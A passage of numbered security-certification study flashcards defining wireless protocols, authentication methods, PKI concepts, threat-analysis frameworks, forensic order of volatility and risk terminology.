CCMP: Counter Mode with Cipher Block Chaining Message Authentication Code Protocol; created to replace WEP/TKIP; uses AES with 128-bit keys; used with WPA2
WPA2: uses CCMP (see above)
WPA3: Personal and Enterprise modes; the Enterprise 192-bit mode uses 256-bit Galois/Counter Mode Protocol (GCMP-256)
SAE: Simultaneous Authentication of Equals; replaces the WPA2-PSK handshake in WPA3-Personal; provides perfect forward secrecy via a Diffie-Hellman-based exchange called Dragonfly
120
Wireless Authentication Protocols
EAP (Extensible Authentication Protocol): an authentication framework that lets new methods be used with existing infrastructure
LEAP (Lightweight EAP): Cisco-proprietary EAP method, now considered insecure
EAP-FAST (Flexible Authentication via Secure Tunneling): developed by Cisco to replace LEAP because LEAP was insecure
PEAP (Protected EAP): encapsulates EAP inside a TLS tunnel, requiring only a server-side certificate; provides authentication and protection of the inner exchange
EAP-TLS: mutual certificate-based authentication; requires an X.509 certificate on the client as well as the server; three parties: supplicant (user device), authenticator (access point or switch) and authentication server (RADIUS)
EAP-TTLS: two phases; the first sets up a TLS tunnel using the server's certificate, the second runs an inner protocol such as MS-CHAP inside the tunnel to complete the session
121
802.1x
Port-based network access control: a device is not allowed onto the network until it authenticates via EAP; commonly used with certificate authentication and a RADIUS server in the enterprise
122
IEEE 802.15
Bluetooth
123
Segmentation
Controlling which services are permitted to access, or be accessible from, other ones through a strict set of rules governing traffic between segments. Rules are enforced on the IP address ranges of each subnet. Within a private subnet, segmentation can be used to achieve departmental isolation
124
Next Gen SWG
Next-Generation Secure Web Gateway: works at layer 7 (application layer), looking at the actual traffic inside the protocol to detect malicious intent; functions include web proxy, policy enforcement, malware detection, traffic inspection, data loss prevention and URL filtering
125
Non-repudiation
The ability to prove a message was sent by a specific individual or an action was performed by a specific individual
126
Authentication Protocols
PAP: Password Authentication Protocol; used by Point-to-Point Protocol to validate users; sends the password in cleartext, so considered weak
CHAP: Challenge Handshake Authentication Protocol; authenticates a user or network host to an authenticating entity with a challenge-response; requires that both client and server know the plaintext of the secret, though the secret itself is not sent over the network
EAP: Extensible Authentication Protocol; an authentication framework
127
Common SSO standards
SAML, OAuth 2.0, OpenID Connect
Also, maybe not on the exam: SESAME, KryptoKnight
128
Kerberos
Authentication protocol used by Microsoft Active Directory (preferred over NTLM); its tickets also carry authorization data
Stronger encryption, interoperability, and mutual authentication (both client and server are verified)
Runs as a trusted third-party server known as the Key Distribution Center (KDC), which includes an Authentication Server, a Ticket Granting Service and a database of secret keys for users and devices
Passes around tickets instead of password hashes
Helps prevent replay attacks through timestamps
129
Access Control Schemes
Non-Discretionary Access Control: enables the enforcement of system-wide restrictions that override object-specific access control (RBAC and MAC are non-discretionary)
Discretionary Access Control (DAC): every object has an owner who can grant or deny access to any other subject; user-centric; e.g. NTFS permissions
Role-Based Access Control (RBAC): permissions are assigned to roles, and users are assigned to roles
Rule-Based Access Control: access is decided by rules such as firewall ACLs or time-of-day restrictions
130
OCSP
Online Certificate Status Protocol: a faster way to check a single certificate's revocation status than downloading the whole CRL
131
CSR
Certificate Signing Request: the message sent to the CA in order to get a digital certificate created. Records identifying information for the person or device that owns the private key, along with the corresponding public key
132
SAN (Certificates)
Subject Alternative Name: an extension to the X.509 spec that allows additional host names to be specified for a single TLS/SSL certificate. Enables support for FQDNs from multiple domains in a single certificate
133
Stapling
Method used with OCSP that allows a web server to provide information on the validity of its own certificate. The web server periodically fetches the signed OCSP response from the CA in advance and staples it to the TLS handshake, so browsers need not contact the CA themselves
134
Pinning
Method designed to mitigate the use of fraudulent certificates. Once a public key or certificate has been seen for a specific host, that key or certificate is pinned to the host. If a different certificate is then presented, it may indicate a fraudulent certificate
135
Key Escrow
Addresses the possibility that a cryptographic key may be lost. Concerned with symmetric keys, or the private key in asymmetric pairs. A key escrow holds copies so lost keys can be recovered and decryption can resume
136
Certificate Chaining
Refers to the fact that certificates are validated through a chain of trust, each certificate signed by the one above it: Root CA -> Subordinate (Intermediate) CA -> Issuing CA -> end-entity (leaf) certificate
137
NSLookup
Tool for looking up the IP address of a hostname (DNS A record by default) from a DNS server. `set type=` changes the DNS record type queried. The Linux equivalent is dig
138
Hping
Packet generator for TCP/IP, often used for auditing firewalls and networks
139
MITRE ATT&CK Framework
Adversarial: looks at the behavior of potential attackers, who are grouped into threat groups
Tactics: the adversary's goal at each stage of an attack (the why)
Techniques: how the adversary achieves that goal (the how), with documented sub-techniques and procedures
Common Knowledge: documentation of the attackers' tactics and techniques that has been made available to the general public
140
Cyber Kill Chain
Traces the stages of a cyber attack:
1 - Reconnaissance
2 - Weaponization
3 - Delivery
4 - Exploitation
5 - Installation
6 - Command and Control
7 - Actions on Objectives
141
Diamond Model
Model of Intrusion Analysis:
Adversary: the threat actor group
Capabilities: the exploits and tools the adversary develops to carry out the attack
Victim: the person or organization targeted by the adversary
Infrastructure: how the attacker reaches the victim (domains, IPs, C2 servers)
142
Windows Logs
System: contains info about hardware changes, updates to devices, time sync, group policy application, etc.
Application: contains info about software applications: when launched, success, failure, and warnings about problems or errors
Security: contains info about successful logins as well as unauthorized attempts to access the system and resources; captures information on file access and can determine who has downloaded certain data
143
Playbooks
Document the human analyst's response steps (checklist) for a specific type of incident
144
Runbooks
The automated version of a playbook's response, typically with human checkpoints for decisions
145
Order of Volatility
1 - CPU cache and register contents
2 - Routing tables, ARP cache, process tables, kernel statistics
3 - Live network connections and data flows
4 - RAM
5 - Temporary file system and swap/pagefile
6 - Data on hard disk
7 - Remotely logged data
8 - Data stored on archival media/backups
146
ISO Frameworks
ISO 27001: international standard on how to manage information security (ISMS requirements)
ISO 27002: Code of Practice for Information Security Controls; aims to improve the management of information security
ISO 27701: extension of 27001/27002; provides guidance on establishing, implementing, maintaining and continually improving a Privacy Information Management System (PIMS)
ISO 31000: provides principles, a framework and a process for managing risk for organizations of any size in any sector
147
Risk Types
External, Internal, Legacy Systems, Multiparty, IP (intellectual property) Theft, Software Compliance/Licensing
148
Residual Risk
Risk after controls are in place
149
Inherent Risk
Risk before controls are in place
150
Total Risk
Risk without controls (the same quantity as inherent risk)
151
Quantitative Risk Analysis
Assigns a dollar value to assets and losses (e.g. SLE, ARO, ALE) to evaluate the effectiveness of countermeasures
152
Qualitative Risk Analysis
Uses a scoring system to rank threats and effectiveness of countermeasures